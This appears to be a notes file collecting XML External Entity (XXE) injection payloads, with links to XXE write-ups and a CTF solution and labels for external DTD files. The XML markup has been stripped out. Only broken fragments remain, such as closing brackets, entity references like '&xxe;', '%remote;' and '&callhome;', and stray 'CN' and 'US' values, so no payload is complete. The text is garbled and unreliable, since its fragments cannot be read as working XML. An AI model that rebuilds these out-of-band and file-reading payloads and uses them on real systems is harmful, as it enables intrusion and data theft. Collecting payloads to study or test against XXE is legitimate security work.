]>
&xxe;
xml
]>
&xxe;
CN
US
%remote;%int;%trick;]>
">
]>
">]>
] [ "]>
]>
file.dtd:
">
on website:
%remote;%int;%trick;]>
https://jbz.team/midnightsunctfquals2019/Rubenscube
file.xml:
">
on website:
%remote;
%test;
%trick;
]>
&file
CN
US
random
CN
US
]>
%alpha;
%bravo;
]>
MAP
CN
US
%alpha;
]>
MAP
CN
US
">
-----------------------------------------------------------------------------------------------------------------------------------
%alpha;
%bravo;
]>
&charlie;
CN
US
">
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study/
https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/
-----------------------------------------------------------------------------------------------------------------------------------
test.dtd
">
%alpha;
%bravo;
%delta;
]>
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
">
%alpha;
%bravo;
%charlie;
%delta;
]>
CN
US
">
%bravo;
]>
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
step 1:
PayloadsAllTheThings
]>
&xxe;
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
step 2:
https://gist.github.com/staaldraad/01415b990939494879b4 - last comment
test.dtd
">
%alpha;
%xxe;
]>
testing
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
]>
&callhome;
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
test4.dtd
">
%dtd;
%all;
%req;
]>
test
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref
%dtd;
%all;
%req;
]>
test
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref
]>
&file;
CN
US